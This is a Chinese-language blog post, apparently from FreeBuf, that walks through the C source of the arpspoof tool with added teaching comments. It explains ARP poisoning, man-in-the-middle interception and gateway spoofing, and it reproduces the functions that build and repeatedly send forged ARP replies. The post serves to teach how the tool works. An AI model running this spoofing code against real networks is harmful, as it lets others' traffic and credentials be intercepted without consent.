本文原创作者:VillanCh
前言
如果你的目标是一个会使用工具的hacker的话,请无视下面的所有内容;如果你的目标是渴望拥有自己的渗透测试工具,编写自己的xxxtools,那么看一些简单的工具的源码一定大有裨益。
背景
今天心血来潮闲着无聊打算分析某个小工具的源代码看看玩。
笔者也是一颗hacker的心,但是有一定的网络编程功底,一直立志不做一名只会用工具的hacker,那么今天晚上我的目标就是那个已经被滥用的ARPspoof。
说实在的我非常不喜欢神化黑客工具,那么我们今天就拿ARPspoof来开刀,看看这个可以实现ARP欺骗的小玩意内藏了多少“可怕的东西”
首先我是看过一些已经在FreeBuf上发出的关于ARP攻击的一些文章,窃以为我能看到,但是爱好者(不具备tcpip知识,网络知识基础薄弱的人可能要遭殃了)然后我准备以一种轻松的,微观的心态来讲一下这个问题,如在文章中出现漏洞或者是错误,欢迎大家指出。
找到ARPspoof的源代码,核心代码基本都不变,那么我们这就开始把!但是ARPspoof的源代码随着版本的更新不停地在重构,我找了一个相对比较稳定的版本。
以一种轻松的方式来补充基础知识
在此之前请允许我补充一些基础知识。
Arp数据包的作用:每一台电脑进入网络之后会广播一条arp数据包来声明自己的身份(ip,mac地址等),那么如果arp被恶意劫持了就是我们所熟悉的arp污染或者arp劫持。为了方便大家理解,我们可以类比我们平时所用的身份证,如果身份证被人拿走了,是不是可以被用来开户开房做坏事洗钱什么的?没错,我们可以姑且把arp当作这样的一个例子,但是也不完全对,就本文讨论这个工具而言的话我们这样理解是足够了。
Libnet库,这个库是一个神奇的库,在可以直接对链路层进行处理,如果你厌倦了socket的规规矩矩的使用,可以考虑看一下libnet库,同样的你也会猜到了,如果你发送大量的链路层数据报,有可能造成网络不稳定等各种问题,那么问题来了flood攻击,DDOS攻击是不是可是实现了?这个问题我还是很有兴趣为大家揭秘的。言归正传,关于libnet的使用,我们在arpspoof里面将会见到。
最最基础的网络知识与基础的linux内核编程知识本文是默认大家已经掌握的。那么我们接下来可以开始了么?不不不。
Think like a hacker
我还需要罗嗦一点讲一讲arp劫持的故事:
我随意网上搜索一个arp劫持的例子。
源于baidu,恩其实这个没什么神秘的,只是做出来效果不错而已
接下来是freebuf的Heee这个作者的一片文章地址《中间人攻击-ARP毒化》。
那么我想说的倒不是这个,arp攻击我个人把它分为两种:1.arp断网;2.arp劫持。其实在成功实施arp断网的时候,实际的效果是被攻击的主机把攻击的机器当作了网关,而所有的数据包都发送到了攻击机上了,也就是说,理论上你是可以拿到它发送的所有数据包的(包括密码???),当然密码是极有可能加密的。
我们再延伸一下,收到了被攻击者发来的数据包我们会怎么办?查看一下么?但是好像查看的意义不太大啊(因为又去无回,被攻击者不停地再发请求数据包,并不会有什么数据交换,这样的数据包实际上是没有什么意思的),于是我们就想办法伪装一下,最简单的办法就是再欺骗一下网关么?bingo!答对了,好,问题又来了欺骗网关就可以了么?你收到的 被害者的数据包没有销赃。。。那么,其实很好解决,端口重定向。关于具体的实施,不是重点。
其实我们要来看看这个arpspoof这个小工具的源代码的。那么现在就可以正式开始了!
从main函数开始
首先大家不要慌,我加了无数注释,这个工具的代码也不过400行而已。首先我们看一下main函数:
为了避免大家看起来太紧张,我在源码的注释中加了详细的讲解,方便基础薄弱的同学理解:
int main(int argc, char *argv[])
{
int c;
char ebuf[PCAP_ERRBUF_SIZE];
intf = NULL;
spoof_ip = target_ip = 0;
/**
关于getopt这个函数我想做如下解释大家就可以读懂下面的函数的具体意思了:
1.getopt的用途:用于专门处理函数参数的。
2.getopt的用法:argc与argv直接是从main的参数中拿下来的,第三个参数描述了整个程序参数的命令要求
具体的用法我们可以先理解为要求i,t这两个参数必须有值
然后有具体值得参数会把值付给全局变量optarg,这样我们就能理解下面的while循环中的操作了
*/
while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
switch (c) {
case 'i':
intf = optarg;
break;
case 't':
/*
libnet_name_resolve是解析域名,然后把域名解析的结果形成ip地址返回到target_ip
*/
if ((target_ip = libnet_name_resolve(optarg, 1)) == -1)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 1)
usage();
if ((spoof_ip = libnet_name_resolve(argv[0], 1)) == -1)
usage();
/*
pcap_lookupdev 顾名思义这个pcap库中的函数是用来寻找本机的可用网络设备。
下面的if语句是将如果intf(-i的参数为空就调用pcap_lookupdev来寻找本机的网络设备)
ebuf就是error_buf用来存储错误信息
*/
if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
/*
libnet_open_link_interface这个函数存在于libnet库中,作用是打开intf指向的网络链路设备
错误信息存入ebuf中。
*/
if ((llif = libnet_open_link_interface(intf, ebuf)) == 0)
errx(1, "%s", ebuf);
/*
下面语句的意思是如果target_ip为0或者是arp_find没有成功找到target_ip
那么提示错误
*/
if (target_ip != 0 && !arp_find(target_ip, &target_mac))
errx(1, "couldn't arp for host %s",
libnet_host_lookup(target_ip, 0));
//这里关于信号的处理问题如果大家不是太清楚的话也可以跳过,
//有兴趣的朋友,可以深入了解一下,因为这里不是本文重点,就不再赘述了
signal(SIGHUP, cleanup);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
for (;;) {
/*
在这个for的循环里我们看到了我们希望看到的核心模块
arp_send大家一看这个函数便知道这个函数是用来发送伪造的arp数据包的,关于这个函数具体的用法我们稍后将会讨论
*/
arp_send(llif, intf, ARPOP_REPLY, NULL, spoof_ip,
(target_ip ? (u_char *)&target_mac : NULL),
target_ip);
sleep(2);
}
/* NOTREACHED */
exit(0);
}
看了main函数里面的各种东西,我们发现并没有什么玄机,其实就是很简单的编程,具体的函数讲解都在注释中写出来了。
核心函数的登场
接下来我们就看一下他是如何实现发送arp包的,其实知道大家看了源代码以后就知道,这真的没有什么技术含量,
/**
这里是我们发送arp包的核心实现
我先来介绍一下这个函数的参数方便大家理解
参数一:libnet链路层接口,通过这个接口可以操作链路层
参数二:本机的网卡设备intf(由-i指定或者pcap_lookupdev来获取)
参数三:arpop,来指定arp包的操作
参数四:本机硬件地址
参数五:本机ip
参数六:目标硬件地址
参数七:目标ip
*/
int arp_send(struct libnet_link_int *llif, char *dev,
int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
char ebuf[128];
u_char pkt[60];
/*
这里来通过链路层和网卡来获取dev对应的mac地址*/
if (sha == NULL &&
(sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
return (-1);
}
/*
这里通过链路层和网卡来获取dev对应的ip地址
*/
if (spa == 0) {
if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
return (-1);
spa = htonl(spa); /* XXX */
}
/*
如果目标mac没有的话就被赋值为\xff\xff\xff\xff\xff\xff
*/
if (tha == NULL)
tha = "\xff\xff\xff\xff\xff\xff";
/*
libnet_ptag_t libnet_build_ethernet(
u_int8_t*dst, u_int8_t *src,
u_int16_ttype, u_int8_t*payload,
u_int32_tpayload_s, libnet_t*l,
libnet_ptag_t ptag )
功能:
构造一个以太网数据包
参数:
dst:目的 mac
src:源 mac
type:上层协议类型
payload:负载,即附带的数据,可设置为 NULL(这里通常写 NULL)
payload_s:负载长度,或为 0(这里通常写 0 )
l:libnet 句柄,libnet_init() 返回的 libnet * 指针
ptag:协议标记,第一次组新的发送包时,这里写 0,同一个应用程序,下一次再组包时,这个位置的值写此函数的返回值。
返回值:
成功:协议标记
失败:-1
*/
libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);
/*
libnet_ptag_t libnet_build_arp(
u_int16_t hrd, u_int16_t pro,
u_int8_t hln, u_int8_t pln,
u_int16_t op, u_int8_t *sha,
u_int8_t *spa, u_int8_t *tha,
u_int8_t *tpa, u_int8_t *payload,
u_int32_t payload_s, libnet_t *l,
libnet_ptag_t ptag )
功能:
构造 arp 数据包
参数:
hrd:硬件地址格式,ARPHRD_ETHER(以太网)
pro:协议地址格式,ETHERTYPE_IP( IP协议)
hln:硬件地址长度
pln:协议地址长度
op:ARP协议操作类型(1:ARP请求,2:ARP回应,3:RARP请求,4:RARP回应)
sha:发送者硬件地址
spa:发送者协议地址
tha:目标硬件地址
tpa:目标协议地址
payload:负载,可设置为 NULL(这里通常写 NULL)
payload_s:负载长度,或为 0(这里通常写 0 )
l:libnet 句柄,libnet_init() 返回的 libnet * 指针
ptag:协议标记,第一次组新的发送包时,这里写 0,同一个应用程序,下一次再组包时,这个位置的值写此函数的返回值。
返回值:
成功:协议标记
失败:-1
*/
libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
NULL, 0, pkt + ETH_H);
fprintf(stderr, "%s ",
ether_ntoa((struct ether_addr *)sha));
/*
下面的if和else是回显处理(也就是大家能看到的部分
*/
if (op == ARPOP_REQUEST) {
fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
ether_ntoa((struct ether_addr *)tha),
libnet_host_lookup(tpa, 0),
libnet_host_lookup(spa, 0));
}
else {
fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
ether_ntoa((struct ether_addr *)tha),
libnet_host_lookup(spa, 0));
fprintf(stderr, "%s\n",
ether_ntoa((struct ether_addr *)sha));
}
return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));
}
我们看到这其实真的没有什么很神奇的内容对吧?
小尾巴
/*
下面我们发现挂载信号处理函数的都是cleanup函数,
这个函数很好理解,就是在本机网络设备存在的条件下把包再发三遍,
但是为什么要这么做呢?似乎立即中断也没什么不合理,
我想作者的意思就是总要给一个缓冲的时间啊
我们再仔细观察一下,在main的主循环中是sleep(2)
在下面的循环中是sleep(1)
*/
void cleanup(int sig)
{
int i;
if (arp_find(spoof_ip, &spoof_mac)) {
for (i = 0; i < 3; i++) {
/* XXX - on BSD, requires ETHERSPOOF kernel. */
/*上面这条注释是源码的作者加的,意思是说在BSD系统中需要ETHERSPOOF的第三方内核模块*/
arp_send(llif, intf, ARPOP_REPLY,
(u_char *)&spoof_mac, spoof_ip,
(target_ip ? (u_char *)&target_mac : NULL),
target_ip);
sleep(1);
}
}
exit(0);
}
这样我们还有什么不理解么?在《中间人攻击-ARP毒化》一文中,arpspoof这个工具被我们以这样的方式解密,大家是否开始觉得其实这并没有任何神奇的地方?这就是我们神化的黑客工具吧。
下载附件
链接 密码: rsua
心血来潮之作,如有高见,希望大家不吝赐教~~
*原创作者:VillanCh,本文属FreeBuf原创奖励计划文章,未经作者本人及FreeBuf许可,切勿私自转载